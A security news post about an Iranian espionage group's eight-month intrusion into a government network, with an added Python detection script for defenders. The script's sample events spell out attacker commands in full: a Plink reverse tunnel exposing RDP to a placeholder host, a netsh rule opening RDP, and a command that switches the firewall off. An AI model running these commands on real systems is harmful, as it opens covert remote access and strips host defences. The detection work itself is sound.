Iranian Hackers Were Lurking For 8 Months In A Government Network 

Broadcom’s Symantec cybersecurity unit is reporting on a meticulous eight-month-long espionage campaign. The Iranian Crambus espionage group, also known as OilRig and APT34, targeted a Middle Eastern government between February and September 2023. During the extended stay, the attackers compromised numerous computers and servers. They executed a range of activities, including the theft of files and passwords.

The attackers implanted a PowerShell backdoor named PowerExchange, which allowed them to monitor incoming emails from an Exchange Server and execute commands through surreptitious emails. The attack affected a minimum of 12 computers, and there are indications that backdoors and keyloggers were placed on dozens more systems.

In addition to deploying malware, the attackers used the publicly available administration tool Plink to configure port-forwarding rules on the compromised machines, granting them remote access through the Remote Desktop Protocol (RDP).

Evidence also suggests the attackers manipulated Windows firewall rules to facilitate remote access.
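The two paragraphs above describe the path to remote access: Plink port-forwarding rules and modified Windows firewall rules that let RDP through. The following is an added example, not code from the article or from Symantec, showing the kind of detection logic a defender would run over process-creation telemetry (Sysmon Event ID 1 or Windows Security 4688 command lines). The event records, hostnames, users and addresses are constructed for the example, and the rule names are my own.

```python
"""Flag process-creation events consistent with Plink port forwarding and
host-firewall tampering that opens RDP access.

All sample events below are constructed for this example; hostnames,
users and addresses are placeholders, not indicators from the report."""
import re
from pathlib import PureWindowsPath

# Plink forwarding flags: -R (remote), -L (local), -D (dynamic SOCKS).
# Case-sensitive on purpose: lowercase -l is Plink's login-name flag.
PLINK_FORWARD = re.compile(r"(?:^|\s)-[RLD]\s+\S+")
# netsh firewall changes (Windows uses case-insensitive option names).
NETSH_ADD_RULE = re.compile(r"advfirewall\s+firewall\s+add\s+rule\b", re.I)
NETSH_DIR_IN = re.compile(r"\bdir=in\b", re.I)
NETSH_ALLOW = re.compile(r"\baction=allow\b", re.I)
NETSH_DISABLE = re.compile(r"advfirewall\s+set\s+\w+\s+state\s+off\b", re.I)
# PowerShell equivalents of the same firewall change.
PS_ADD_RULE = re.compile(r"New-NetFirewallRule\b", re.I)
PS_INBOUND = re.compile(r"-Direction\s+Inbound\b", re.I)
PS_ALLOW = re.compile(r"-Action\s+Allow\b", re.I)
RDP_PORT = re.compile(r"\b3389\b")

# Constructed process-creation records (fields mimic Sysmon EID 1 / 4688).
SAMPLE_EVENTS = [
    {"host": "srv-01", "user": "svc_backup", "image": r"C:\Users\Public\plink.exe",
     "cmdline": r"plink.exe -N -R 3389:127.0.0.1:3389 -P 443 user@203.0.113.10 -pw x"},
    {"host": "ws-07", "user": "jdoe", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="Remote Desktop" '
                'dir=in action=allow protocol=TCP localport=3389'},
    {"host": "ws-07", "user": "jdoe", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall set allprofiles state off"},
    # Benign interactive SSH session: Plink, but no forwarding flag.
    {"host": "ws-03", "user": "asmith", "image": r"C:\Program Files\PuTTY\plink.exe",
     "cmdline": r"plink.exe -ssh admin@10.0.0.5"},
    {"host": "ws-03", "user": "asmith", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]


def classify(event):
    """Return a list of (rule, severity) pairs matched by one event."""
    image = PureWindowsPath(event["image"]).name.lower()
    cmd = event["cmdline"]
    hits = []
    if image == "plink.exe" and PLINK_FORWARD.search(cmd):
        # Forwarding of the RDP port is the specific pattern in the report.
        hits.append(("plink_port_forward", "high" if RDP_PORT.search(cmd) else "medium"))
    if image == "netsh.exe":
        if NETSH_ADD_RULE.search(cmd) and NETSH_DIR_IN.search(cmd) and NETSH_ALLOW.search(cmd):
            hits.append(("firewall_inbound_allow", "high" if RDP_PORT.search(cmd) else "medium"))
        if NETSH_DISABLE.search(cmd):
            hits.append(("firewall_disabled", "high"))
    if image in ("powershell.exe", "pwsh.exe"):
        if PS_ADD_RULE.search(cmd) and PS_INBOUND.search(cmd) and PS_ALLOW.search(cmd):
            hits.append(("firewall_inbound_allow", "high" if RDP_PORT.search(cmd) else "medium"))
    return hits


def detect(events):
    """Run every rule over a list of events; one finding dict per match."""
    findings = []
    for ev in events:
        for rule, severity in classify(ev):
            findings.append({"host": ev["host"], "user": ev["user"],
                             "rule": rule, "severity": severity,
                             "cmdline": ev["cmdline"]})
    return findings


def hosts_to_triage(events):
    """Distinct hosts with at least one finding, sorted for reporting."""
    return sorted({f["host"] for f in detect(events)})


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] {f['host']:7} {f['user']:11} {f['rule']:22} {f['cmdline']}")
    print("hosts to triage:", hosts_to_triage(SAMPLE_EVENTS))
```

The Plink rule is deliberately case-sensitive because `-l` is Plink's login-name option and would otherwise collide with `-L`; the benign interactive session in the sample shows why plain "plink.exe ran" is too noisy on its own. In practice the same rules apply equally well to Sysmon Event ID 3 (network connections from plink.exe) and to Windows Firewall audit events (Event ID 4946/4950 in the Security log), which catch rule changes made through the GUI or API rather than a command line.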

Emily Phelps, Director, Cyware had this comment:

   “Advanced persistent threat (APT) groups such as Crambus have the resources to maintain ongoing targeted attacks. The importance of organizations and government entities moving from a reactive to proactive cybersecurity posture cannot be overstated. Investing not only in threat intelligence but in technologies that enable organizations to take action on intelligence is mission critical to outpacing motivated adversaries.”

David Mitchell, Chief Technical Officer, HYAS adds this:

   “While this is not surprising, it further reinforces the need for network wide visibility and protection. Without knowing the details of said government’s security posture internally, it appears they did not utilize protective DNS, network traffic visibility or log analysis — a combination of methods that would’ve most assuredly detected this behavior. Siloed security products continue to give customers a false sense of security and need to be deployed up and down the OSI stack in order to be effective.”

Much like the North Koreans, the Iranians are a threat to your cybersecurity that cannot be ignored. Thus your security posture needs to take that into account or bad things will happen. As was the case here.
